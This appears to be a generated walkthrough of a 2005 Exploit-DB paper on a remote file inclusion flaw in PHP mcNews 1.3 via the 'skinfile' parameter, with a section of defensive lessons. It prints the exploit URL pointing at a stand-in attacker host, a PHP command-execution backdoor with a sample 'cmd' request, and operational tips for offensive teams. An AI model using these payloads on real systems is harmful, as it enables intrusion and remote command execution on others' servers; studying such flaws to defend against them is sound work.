PHP mcNews 1.3 'skinfile' Remote File Inclusion Explained
PHP mcNews 1.3 'skinfile' Remote File Inclusion Explained
What this paper is
This paper details a vulnerability in PHP mcNews version 1.3. The vulnerability is a Remote File Inclusion (RFI) flaw, meaning an attacker can trick the web application into including and executing arbitrary code from a remote server. This is achieved by manipulating the skinfile parameter.
Simple technical breakdown
The vulnerability exists because the mcNews application doesn't properly sanitize user input for the skinfile parameter. When register_globals is enabled in the PHP configuration and allow_url_fopen is also enabled, an attacker can provide a URL to a malicious PHP script on their own server. The mcNews application will then fetch and execute this script as if it were a local file.
Complete code and payload walkthrough
The provided "code" is not a traditional exploit script but rather a demonstration of how to trigger the vulnerability using a crafted URL.
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/Let's break this down:
if register_globals=on and allow_url_fopen=on:: This is a condition. The exploit will only work if these two specific PHP configuration settings are enabled on the victim's server.register_globals=on: This PHP directive, when enabled, automatically registers environment variables (like GET, POST, cookie, session variables) as global variables. This means a parameter likeskinfilein a URL can directly become a variable named$skinfilewithin the script.allow_url_fopen=on: This PHP directive allows the use of URL-like wrappers (likehttp://,ftp://) when accessing files. This is crucial for including remote files.
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/: This is the exploit URL.http://[victim]/: The base URL of the vulnerable web server.[dir]/mcNews/admin/header.php: The specific script withinmcNewsthat is vulnerable. Theheader.phpscript likely includes theskinfileparameter to load a skin or template.?skinfile=: This indicates the start of query parameters.skinfileis the parameter being exploited.http://[hacker_box]/: This is the URL of the attacker's server. The attacker would host a malicious PHP file (e.g., a simple backdoor or command execution script) at this location. Whenheader.phptries to includehttp://[hacker_box]/, PHP, withallow_url_fopenenabled, will fetch the content from the attacker's server and execute it.
Mapping list:
register_globals=on-> Enables direct use of URL parameters as global variables.allow_url_fopen=on-> Enables inclusion of remote files via URLs.http://[victim]/[dir]/mcNews/admin/header.php-> The vulnerable application endpoint.?skinfile=-> The vulnerable parameter name.http://[hacker_box]/-> The attacker-controlled remote file to be included and executed.
Payload:
The "payload" in this context is the content of the PHP file hosted on [hacker_box]. A common payload for RFI would be a simple PHP backdoor that allows command execution. For example, a file named backdoor.php on [hacker_box] could contain:
<?php
// Simple command execution backdoor
if(isset($_GET['cmd'])){
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
}
?>When the victim's server includes this file via skinfile, the attacker could then send requests like:http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/backdoor.php&cmd=ls -la
This would execute ls -la on the victim's server and display the output.
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are required on the victim's system itself. The attack targets the web application's interaction with the server's PHP configuration.
- Lab Preconditions:
- A controlled attacker server (
[hacker_box]) capable of hosting PHP files and serving them over HTTP. - A vulnerable
mcNews1.3 installation on a target web server. - The target web server must have
register_globalsandallow_url_fopenenabled in its PHP configuration. This is the most critical prerequisite.
- A controlled attacker server (
- Tooling Assumptions:
- A web browser for crafting and sending exploit URLs.
- A simple HTTP server (e.g., Python's
SimpleHTTPServer, Apache, Nginx) for hosting the payload on the attacker's machine. - A text editor for creating the payload PHP file.
- Execution Pitfalls:
- PHP Configuration: If
register_globalsorallow_url_fopenare disabled, the exploit will not work. Modern PHP versions have these settings disabled by default for security reasons. - Firewall/Network Restrictions: The victim's server might be configured to prevent outbound HTTP connections to arbitrary external IPs, blocking the inclusion of the remote file.
- Input Validation (if patched): Even if
register_globalsandallow_url_fopenare on, subsequent versions or patches ofmcNewsmight have added input validation forskinfile. - Payload Location: The attacker needs to ensure their payload is accessible and correctly formatted.
- URL Encoding: Special characters in the
cmdparameter (if used for command execution) might need URL encoding.
- PHP Configuration: If
Where this was used and when
This vulnerability was published in March 2005. Exploits of this nature were common in the mid-2000s when PHP web applications were widely deployed, and security configurations like register_globals were often left enabled for ease of development. It would have been used against any web server running mcNews 1.3 with the vulnerable PHP configuration.
Defensive lessons for modern teams
- Disable
register_globals: This is a fundamental security best practice and has been deprecated and removed in modern PHP versions. Never enable it. - Disable
allow_url_fopen(or restrict): While sometimes necessary for legitimate functionality,allow_url_fopensignificantly increases the risk of RFI. If it must be enabled, implement strict input validation and consider usingallow_url_include(which is off by default) for more granular control. - Input Validation is Key: Always validate and sanitize all user-supplied input, especially parameters used in file operations or external requests. Treat all external input as untrusted.
- Keep Software Updated: Ensure all web applications and their dependencies are kept up-to-date to patch known vulnerabilities.
- Web Application Firewalls (WAFs): A WAF can help detect and block common RFI patterns in HTTP requests.
- Network Segmentation and Egress Filtering: Restrict outbound network connections from web servers to only necessary destinations.
ASCII visual (if applicable)
+-----------------+ +-----------------+ +-----------------+
| Attacker Server |----->| Victim Web |----->| PHP Interpreter |
| (hacker_box) | | Server | | (on victim) |
| - Payload.php | | - mcNews/admin/ | | - allow_url_fopen|
+-----------------+ | header.php | | - register_globals|
| - ?skinfile=URL | +-----------------+
+-----------------+
^
|
| (Exploit URL)
|
+-----------------+ +-----------------+
| Attacker Client |----->| Victim Web |
| (Browser) | | Server |
+-----------------+ +-----------------+Explanation:
The attacker's client crafts an HTTP request. This request targets the vulnerable header.php script on the victim's web server, passing a URL to the attacker's payload via the skinfile parameter. The PHP interpreter on the victim's server, with allow_url_fopen and register_globals enabled, interprets the skinfile parameter as a remote file path, fetches the Payload.php from the attacker's server, and executes its contents.
Source references
- Paper ID: 865
- Paper Title: PHP mcNews 1.3 - 'skinfile' Remote File Inclusion
- Author: Filip Groszynski
- Published: 2005-03-07
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/865
- Raw URL: https://www.exploit-db.com/raw/865
Original Exploit-DB Content (Verbatim)
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/
# milw0rm.com [2005-03-07]